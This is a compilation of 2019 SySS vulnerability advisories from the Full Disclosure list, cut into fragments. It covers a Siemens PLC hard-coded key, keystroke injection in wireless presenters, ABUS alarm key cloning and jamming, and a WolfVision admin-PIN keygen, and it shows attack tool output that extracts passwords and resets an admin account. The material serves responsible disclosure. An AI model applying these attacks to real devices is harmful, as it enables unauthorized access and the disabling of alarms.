https://www.syss.de/en/responsible-disclosure-policy/ [7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking" https://youtu.be/TpH4EABGYCs Credits: This security vulnerability was found by Manuel Stotz of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D Disclaimer: The information provided in this security
[FD] [SYSS-2019-012]: Siemens LOGO! 8 - Use of Hard-coded Cryptographic Key (CWE-321)
Advisory ID: SYSS-2019-012 Product: LOGO! Manufacturer: Siemens Affected Version(s): LOGO! 8 (all versions) Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03 Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: High Solution Status: Open Manufacturer Notification: 2019-04-04 Solution Date: 2019-05-14 (recommended mitigation by manufacturer) Public Disclosure: 2019-05-29 CVE Reference: CVE-2019-10920 Authors of Advisory: Manuel Stotz, Matthias Deeg (SySS GmbH) Overview: Siemens LOGO! is a programmable logic controller (PLC) for small automation tasks. The manufacturer describes the product as follows (see [1]): "Simple installation, minimum wiring, user-friendly programming: You can easily implement small automation projects with LOGO!, the intelligent logic module from Siemens. The LOGO! Logic Module saves space in the control cabinet, and lets you easily implement functions, such as time-delay switches, time relays, counters and auxiliary relays. " Due to the use of a hard-coded cryptographic key, an attacker can put the integrity and confidentiality of encrypted data of all LOGO! 8 PLCs using this key at risk, for instance decrypting network communication during a man-in-the-middle attack. Vulnerability Details: SySS GmbH found out that LOGO! PLCs use a static, hard-coded cryptographic 3DES key for protecting sensitive information, like network communication and configuration data. For instance, this key can be found within the LOGO! Soft Comfort software. By knowing this static cryptographic 3DES key, an attacker can decrypt all LOGO! data that is encrypted with this key and gain access to sensitive data, for instance different configured passwords. Proof of Concept (PoC): SySS GmbH used the hard-coded cryptographic 3DES key in a software tool (Nmap script) for extracting sensitive data such as configured passwords as cleartext. The following Nmap output exemplarily shows extracting password data from a LOGO! 8 PLC: $ nmap -p 10005 --script slig.nse 192.168.10.112 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 09:35 CEST Nmap scan report for 192.168.10.112 Host is up (0.00044s latency). PORT STATE SERVICE 10005/tcp open stel | slig: Gathered Siemens LOGO!8 access details and passwords | User: LSCUser | Password: S3cret1 | Enabled: True | User: AppUser | Password: S3cret2 | Enabled: True | User: WebUser | Password: S3cret3 | Enabled: True | User: TDUser | Password: S3cret4 | Enabled: True | Protection: Password | Program password: SECRET |_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds A successful attack against a LOGO! 8 extracting all configured passwords is demonstrated in our SySS PoC video [5]. Solution: In the publicly released Siemens Security Advisory SSA-542701 [3], the manufacturer Siemens recommends to apply a defense-in-depth concept, including protection concept outlined in the system manual, as a mitigation for reducing the risk of the described security issue. Disclosure Timeline: 2019-04-04: Vulnerability reported to manufacturer 2019-04-04: Manufacturer confirms receipt of security advisory and asks for referenced Nmap script 2019-04-04: SySS provides PoC Nmap script 2019-05-14: Public release of Siemens Security Advisory SSA-542701 2019-05-29: Public release of SySS security advisory References: [1] Product website for Siemens LOGO! https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html [2] SySS Security Advisory SYSS-2019-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt [3] Siemens Security Advisory SSA-542701 https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [5] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking" https://youtu.be/TpH4EABGYCs Credits: This security vulnerability was found by Manuel Stotz of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D Disclaimer: The information provided in this security advisory is provided "as is" and without
[FD] [SYSS-2019-007]: Inateck 2.4 GHz Wireless Presenter WP1001 - Keystroke Injection Vulnerability
Advisory ID: SYSS-2019-007 Product: 2.4 GHz Wireless Presenter WP1001 Manufacturer: Inateck Affected Version(s): Rev. v1.3C Tested Version(s): Rev. v1.3C Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2019-03-22 Solution Date: - Public Disclosure: 2019-06-04 CVE Reference: CVE-2019-12505 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Inateck WP1001 is a wireless presenter using 2.4 GHz radio communication. The manufacturer describes the product as follows: "* 2.4GHz Wireless Connection allows you to move around while giving presentations * Fingertip Controls make it easy for you to adjust the volume, change slides and more * Red Laser Pointer words up to 65 feet(20m) away * LCD Screen with timer vibration and low-battery indicator * Includes Carrying Case to help protect your device on the go " Due to unencrypted and unauthenticated data communication, the wireless presenter Inateck WP1001 is prone to keystroke injection attacks. Vulnerability Details: SySS GmbH found out that the wireless presenter Inateck WP1001 is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless presenter to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to inject packets in the data communication that are actually interpreted as keystrokes by the receiver on the target system. Thus, an attacker is able to send arbitrary keystrokes to a victim's computer system, for example in order to install malware when the target system is unattended. In this way, an attacker can remotely take control over the victim's computer that is operated with an affected receiver of an Inateck WP1001 wireless presenter. Proof of Concept (PoC): SySS GmbH could successfully perform keystroke injection attacks against the wireless presenter Inateck WP1001 using the open-source software tool Universal Radio Hacker [2] in combination with the software-defined radio HackRF One [3]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-03-22: Vulnerability reported to manufacturer 2019-06-04: Public release of security advisory References: [1] Manufacturer website https://www.inateck.com/ [2] Universal Radio Hacker (URH) https://github.com/jopohl/urh [3] HackRF One by Great Scott Gadgets https://greatscottgadgets.com/hackrf/ [4] SySS Security Advisory SYSS-2019-007 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-007.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en signature.asc Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SYSS-2019-015]: Logitech R700 Laser Presentation Remote - Keystroke Injection Vulnerability
Advisory ID: SYSS-2019-015 Product: R700 Laser Presentation Remote Manufacturer: Logitech Affected Version(s): Model R-R0010 (PID WD904XM and PID WD802XM) Tested Version(s): Model R-R0010 (PID WD904XM and PID WD802XM) Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2019-04-12 Solution Date: - Public Disclosure: 2019-06-04 CVE Reference: CVE-2019-12506 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Logitech R700 Laser Presentation Remote is a wireless presenter using 2.4 GHz radio communication. The manufacturer describes the product as follows [1]: "Brilliant red laser pointer helps you get their attention - and keep it." Due to unencrypted and unauthenticated data communication, the wireless presenter Logitech R700 Laser Presentation Remote is prone to keystroke injection attacks. Vulnerability Details: SySS GmbH found out that the wireless presenter Logitech R700 Laser Presentation Remote is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless presenter to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to inject packets in the data communication that are actually interpreted as keystrokes by the receiver on the target system. Thus, an attacker is able to send arbitrary keystrokes to a victim's computer system, for example in order to install malware when the target system is unattended. In this way, an attacker can remotely take control over the victim's computer that is operated with an affected receiver of a Logitech R700 wireless presenter. Proof of Concept (PoC): SySS GmbH could successfully perform keystroke injection attacks against the wireless presenter Logitech R700 Laser Presentation Remote using an in-house developed software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Bastille Networks Internet Security [2, 3]. The following output of the developed proof-of-concept software tool illustrates a successful attack: # python2 logitech_presenter.py -a 7F:20:9E:C2:07 _ __ ___ _ _ _ _ _ | __ \| |__ \| || | | __ \| || | _ __ | |__) | |__ ) | || |_ | |__) | | __ _ _ _ ___ ___| |_ | '_ \| _ /| __| / /|__ _| | ___/| |/ _` | | | / __|/ _ \ __| | | | | | \ \| | / /_ | | | || | (_| | |_| \__ \ __/ |_ |_| |_|_| \_\_||| |_| |_||_|\__,_|\__, |___/\___|\__| __/ | |___/ Logitech Wireless Presenter Attack Tool v1.0 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure nRF24 radio [*] Actively searching for address 07:C2:9E:20:7F [*] Ping success on channel 8 [*] Ping success on channel 8 [*] Press to start keystroke injection ^C [*] Start keystroke injection ... [*] Done. This demonstrated keystroke injection attack also worked in 2016 against the wireless presenter Logitech R400, which is described in the SySS security advisory SYSS-2016-074 [4]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-04-12: Vulnerability reported to manufacturer 2019-06-04: Public release of security advisory References: [1] Product website for Logitech R700 https://www.logitech.com/en-roeu/product/professional-presenter-r700 [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] Bastille's nRF24 research firmware and tools https://github.com/BastilleResearch/nrf-research-firmware [4] SySS Security Advisory SYSS-2016-074 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-074.txt [5] SySS Security Advisory SYSS-2019-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-015.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4
[FD] [SYSS-2019-008]: Inateck 2.4 GHz Wearable Wireless Presenter WP2002 - Keystroke Injection Vulnerability
Advisory ID: SYSS-2019-008 Product: 2.4 GHz Wearable Wireless Presenter WP2002 Manufacturer: Inateck Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2019-03-22 Solution Date: - Public Disclosure: 2019-06-04 CVE Reference: CVE-2019-12504 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Inateck WP2002 is a ring-shaped wearable wireless presenter using 2.4 GHz radio communication. The manufacturer describes the product as follows: " * Easy to Use: Uses 2.4 GHz USB wireless connection, with receiving distance reaching 20 meters. You’re free to move in a large space when wearing it on fingers. No driver needed, just plug and play! * Ring-shaped design. You can wear it on your fingers (the ring is adjustable). Free your hands and have more body language, which will let your speech become more attractive. * Multi-functional: By controlling the three function keys in control key area, you can turn pages, open full screen, close the screen, and access a hyperlink. * Prolonged working use. Full charge allows a continuous working time of 15 days. Battery life is powerful, which greatly facilitates frequent use. * Fits Powerpoint, Keynote(except hyperlink and windows switch functions), and supports page turning function with Google Slides and Prezi. Compatible with Windows XP/7/8/8.1/10, Mac OS, Linux, Android and etc. " Due to unencrypted and unauthenticated data communication, the wireless presenter Inateck WP2002 is prone to keystroke injection attacks. Vulnerability Details: SySS GmbH found out that the wireless presenter Inateck WP2002 is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless presenter to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to inject packets in the data communication that are actually interpreted as keystrokes by the receiver on the target system. Thus, an attacker is able to send arbitrary keystrokes to a victim's computer system, for example in order to install malware when the target system is unattended. In this way, an attacker can remotely take control over the victim's computer that is operated with an affected receiver of an Inateck WP2002 wireless presenter. Proof of Concept (PoC): SySS GmbH could successfully perform keystroke injection attacks against the wireless presenter Inateck WP2002 using the open-source software tool Universal Radio Hacker [2] in combination with the software-defined radio HackRF One [3]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-03-22: Vulnerability reported to manufacturer 2019-06-04: Public release of security advisory References: [1] Product website for Inateck WP2002 https://www.inateck.com/de/kabellos-praesentationsgeraet-laiserpointer-presenter-fernbedienung-powerpoint-keynote-usb-adapter-plug-and-play-schwarz-wp2002.html [2] Universal Radio Hacker (URH) https://github.com/jopohl/urh [3] HackRF One by Great Scott Gadgets https://greatscottgadgets.com/hackrf/ [4] SySS Security Advisory SYSS-2019-008 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-008.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en signa
[FD] [SYSS-2019-005]: ABUS Secvest - Proximity Key - Cryptographic Issues (CWE-310)
Advisory ID: SYSS-2019-005 Product: ABUS Secvest (FUAA5) Manufacturer: ABUS Affected Version(s): v3.01.01 Tested Version(s): v3.01.01 Vulnerability Type: Cryptographic Issues (CWE-310) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-03-15 Solution Date: - Public Disclosure: 2019-05-02 CVE Reference: CVE-2019-9861 Authors of Advisory: Matthias Deeg, Gerhard Klostermeier (SySS GmbH) Overview: ABUS Secvest (FUAA5) is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " * Convenient operation via the app (Android/iOS), integrated web browser and also at the alarm panel * For up to 50 users with freely selectable control options (code/chip key/remote control) * Active intrusion protection in combination with additional mechatronic wireless window/door locks * Video verification of alarms via email, push notifications or via the app * Up to 48 individually identifiable wireless detectors, eight control panels, 50 remote controls * Integrated dialling device * VdS Home certified and EN 50131-1 Level 2 * Alarm verification via the integration of up to six IP cameras * 32 additional wireless outputs for flexible event control * Switching to monitoring station via protocols possible " Due to the use of an insecure RFID technology (MIFARE Classic), ABUS proximity chip keys (RFID tokens) [2] of the ABUS Secvest wireless alarm system can easily be cloned and used to deactivate the alarm system in an unauthorized way. Vulnerability Details: SySS GmbH found out that the RFID technology used by the ABUS Secvest wireless alarm system and its ABUS proximity keys (MIFARE Classic RFID tags) is vulnerable to RFID cloning attacks. The information stored on the used proximity keys can be read easily in a very short time from distances up to 1 meter, depending on the used RFID reader. A working cloned RFID token is ready for use within a couple of seconds using freely available tools. Thus, an attacker with one-time access to the information of an ABUS proximity key for an ABUS Secvest wireless alarm system is able to create a rogue RFID token that can be used to deactivate the alarm system in an unauthorized manner. Proof of Concept (PoC): SySS GmbH could successfully clone ABUS proximity keys of an ABUS Secvest wireless alarm system using different freely available off-the-shelf tools like an Android smartphone with the Mifare Classic Tool (MCT) [3], a ChameleonMini [4], and an RFID/NFC reader/writer [5] and disarm the wireless alarm system in an unauthorized way. All three RFID cloning attacks are demonstrated in our SySS proof-of-concept video "ABUS Secvest Proximity Key Cloning PoC Attack" [6]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-03-15: Vulnerability reported to manufacturer 2016-05-02: Public release of security advisory References: [1] Product website for ABUS Secvest wireless alarm system https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] Product website for ABUS proximity chip key https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Proximity-Chip-Key [3] MIFARE Classic Tool - MCT https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool [4] GitHub repository of ChameleonMini https://github.com/emsec/ChameleonMini [5] OBO Hands RFID/NFC Reader/Writer https://www.amazon.de/dp/B07DHL9XQ4/ [6] SySS Proof-of-Concept Video: ABUS Secvest Proximity Key Cloning PoC Attack https://youtu.be/sPyXTQXTEcQ [7] SySS Security Advisory SYSS-2019-005 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-005.txt [8] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg and Gerhard Klostermeier of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30
[FD] [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321)
Advisory ID: SYSS-2019-021 Product: Cynap Manufacturer: WolfVision Affected Version(s): 1.18g, 1.28j Tested Version(s): 1.18g, 1.28j Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2019-05-03 Solution Date: 2019-06-19 Public Disclosure: 2019-07-04 CVE Reference: Not assigned yet Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH) Overview: WolfVision Cynap is a wireless collaboration and presentation system. The manufacturer describes the product as follows [1]: "Cynap is a stand-alone all-in-one wireless collaboration and presentation system which includes a built-in media player, web conferencing, on-board recording and streaming , BYOD screen sharing for all mobile devices, and annotation functionality, making it the ideal device to form the centrepiece of new and adapted classrooms and meeting spaces." Due to the use of a hard-coded cryptographic key, an attacker can generate support PINs for resetting the administrative user password in order to gain administrative access to the device. Vulnerability Details: SySS GmbH found out that the WolfVision Cynap wireless collaboration and presentation system uses a static, hard-coded cryptographic secret for generating support PINs used for the provided 'forgot password' functionality. By knowing this static secret and the corresponding algorithm for calculating support PINs, an attacker can reset the password of the administrative user account "ADMIN" and thus gain unauthorized access to the affected Cynap device via a network connection. Proof of Concept (PoC): SySS GmbH developed a software tool for generating support PINs either in online or offline mode. The following output of the software tools illustrates a successful attack resulting in a reset password for the administrative user account "ADMIN". $ python ./wolfvision_cynap_keygen.py --online 192.168.40.109 WolfVision vSolution Cynap Keygen by Manuel Stotz Gerhard Klostermeier [*] Launch keygen in online mode ... [OK] [*] Gathering data ... [OK] [*] Serialnumber: [*] Support PIN: 447301 [*] Generating new Support PIN ... [OK] [+] New Support PIN: 723247 [*] Account: ADMIN [*] Password: Password [*] Bye! A successful attack against a vulnerable WolfVision Cynap device gaining administrative access is demonstrated in our SySS PoC video "Administrating WolfVision Cynap the Hacker's Way" [5]. Solution: Install the firmware version 1.30j provided by the manufacturer WolfVision [2]. Disclosure Timeline: 2019-05-03: Vulnerability reported to manufacturer 2019-05-10: Vulnerability reported to manufacturer again 2019-05-13: Manufacturer confirms receipt of security advisory 2019-05-31: Manufacturer schedules firmware update 1.30j with fix for the reported security issue 2019-06-19: Release of firmware update 1.30j including security fix 2019-07-04: Public release of SySS security advisory References: [1] Product website for WolfVision Cynap https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap [2] WolfVision firmware downloads https://wolfvision.com/vsolution/index.php/de/support/downloads [3] SySS Security Advisory SYSS-2019-021 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the Hacker's Way" https://youtu.be/veEtiYAWvMY Credits: This security vulnerability was found by Manuel Stotz and Gerhard Klostermeier of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to
[FD] [SYSS-2019-004]: ABUS Secvest (FUAA50000) - Message Transmission - Unchecked Error Condition (CWE-391) (CVE-2019-14261)
Advisory ID: SYSS-2019-004 Product: ABUS Secvest (FUAA5) Manufacturer: ABUS Affected Version(s): v3.01.01 Tested Version(s): v3.01.01 Vulnerability Type: Message Transmission - Unchecked Error Condition (CWE-391) Risk Level: High Solution Status: Open Manufacturer Notification: 2019-03-02 Solution Date: - Public Disclosure: 2019-07-26 CVE Reference: CVE-2019-14261 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest (FUAA5) is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " * Convenient operation via the app (Android/iOS), integrated web browser and also at the alarm panel * For up to 50 users with freely selectable control options (code/chip key/remote control) * Active intrusion protection in combination with additional mechatronic wireless window/door locks * Video verification of alarms via email, push notifications or via the app * Up to 48 individually identifiable wireless detectors, eight control panels, 50 remote controls * Integrated dialling device * VdS Home certified and EN 50131-1 Level 2 * Alarm verification via the integration of up to six IP cameras * 32 additional wireless outputs for flexible event control * Switching to monitoring station via protocols possible " Due to an insufficient implementation of the jamming detection, an attacker is able to suppress correctly received RF messages sent between wireless peripheral components, for example wireless detectors or remote controls, and the ABUS Secvest alarm central. Vulnerability Details: Thomas Detert found out that the jamming detection of the ABUS alarm central does not detect short jamming signals that are shorter than normal ABUS RF messages. Thus, an attacker is able to perform a "reactive jamming" attack. The reactive jamming simply detects the start of a RF message sent by a component of the ABUS Secvest wireless alarm system, for instance a wireless motion detector (FUBW5) or a remote control (FUBE50014 or FUBE50015), and overlays it with random data before the original RF message ends. Thereby, the receiver (alarm central) is not able to properly decode the original transmitted signal. This enables an attacker to suppress correctly received RF messages of the wireless alarm system in an unauthorized manner, for instance status messages sent by a detector indicating an intrusion. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows suppressing arming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform the described reactive jamming attack against an ABUS Secvest wireless alarm system. RF messages sent by the configured ABUS Secvest components FUBE50015 (remote control), FUBW5 (motion detector), and FUMK5W (magnetic contact detector) were successfully suppressed and no alarm was triggered. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-03-02: Vulnerability reported to manufacturer 2019-07-26: Public release of security advisory References: [1] Product website for ABUS Secvest wireless alarm system https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] SySS Security Advisory SYSS-2019-004 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-004.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Thomas Detert. Mr. Detert reported his finding to SySS GmbH where it was verified and later reported to the manufacturer by Matthias Deeg. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this
[FD] UPDATE: [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321) [CVE-2019-13352]
Advisory ID: SYSS-2019-021 Product: Cynap Manufacturer: WolfVision Affected Version(s): 1.18g, 1.28j Tested Version(s): 1.18g, 1.28j Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2019-05-03 Solution Date: 2019-06-19 Public Disclosure: 2019-07-04 CVE Reference: CVE-2019-13352 Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH) Overview: WolfVision Cynap is a wireless collaboration and presentation system. The manufacturer describes the product as follows [1]: "Cynap is a stand-alone all-in-one wireless collaboration and presentation system which includes a built-in media player, web conferencing, on-board recording and streaming , BYOD screen sharing for all mobile devices, and annotation functionality, making it the ideal device to form the centrepiece of new and adapted classrooms and meeting spaces." Due to the use of a hard-coded cryptographic key, an attacker can generate support PINs for resetting the administrative user password in order to gain administrative access to the device. Vulnerability Details: SySS GmbH found out that the WolfVision Cynap wireless collaboration and presentation system uses a static, hard-coded cryptographic secret for generating support PINs used for the provided 'forgot password' functionality. By knowing this static secret and the corresponding algorithm for calculating support PINs, an attacker can reset the password of the administrative user account "ADMIN" and thus gain unauthorized access to the affected Cynap device via a network connection. Proof of Concept (PoC): SySS GmbH developed a software tool for generating support PINs either in online or offline mode. The following output of the software tools illustrates a successful attack resulting in a reset password for the administrative user account "ADMIN". $ python ./wolfvision_cynap_keygen.py --online 192.168.40.109 WolfVision vSolution Cynap Keygen by Manuel Stotz Gerhard Klostermeier [*] Launch keygen in online mode ... [OK] [*] Gathering data ... [OK] [*] Serialnumber: [*] Support PIN: 447301 [*] Generating new Support PIN ... [OK] [+] New Support PIN: 723247 [*] Account: ADMIN [*] Password: Password [*] Bye! A successful attack against a vulnerable WolfVision Cynap device gaining administrative access is demonstrated in our SySS PoC video "Administrating WolfVision Cynap the Hacker's Way" [5]. Solution: Install the firmware version 1.30j provided by the manufacturer WolfVision [2]. Disclosure Timeline: 2019-05-03: Vulnerability reported to manufacturer 2019-05-10: Vulnerability reported to manufacturer again 2019-05-13: Manufacturer confirms receipt of security advisory 2019-05-31: Manufacturer schedules firmware update 1.30j with fix for the reported security issue 2019-06-19: Release of firmware update 1.30j including security fix 2019-07-04: Public release of SySS security advisory 2019-07-08: Release of updated security advisory with assigned CVE ID References: [1] Product website for WolfVision Cynap https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap [2] WolfVision firmware downloads https://wolfvision.com/vsolution/index.php/de/support/downloads [3] SySS Security Advisory SYSS-2019-021 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the Hacker's Way" https://youtu.be/veEtiYAWvMY Credits: This security vulnerability was found by Manuel Stotz and Gerhard Klostermeier of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of
[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)
Advisory ID: SYSS-2019-027 Product: BCST-60 Barcode Scanner Manufacturer: Inateck Affected Version(s): BCST-60 Tested Version(s): BCST-60 Vulnerability Type: Cryptographic Issues (CWE-310) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2019-05-22 Solution Date: - Public Disclosure: 2019-11-28 CVE Reference: CVE-2019-12503 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Inateck BCST-60 is a barcode scanner that can be either used wirelessly using 2.4 GHz radio communication or wired via USB. The manufacturer describes the product as follows [1]: "With a 2.4G wireless connection, avoid the troubles of Bluetooth pairing. Inateck BCST-60 is a leading product among scanners in the field of large transmission ranges and battery endurance. What's more, it can read barcodes at extreme angles. Whether you need barcode scanning at your retail POS, at a hospital patient's bedside, on the manufacturing production line or your warehouse, the Inateck BCST-60 will be a great fit for your specific needs." Due to an insecure implementation of the data communication, the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks. Vulnerability Details: SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless barcode scanner to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to send packets 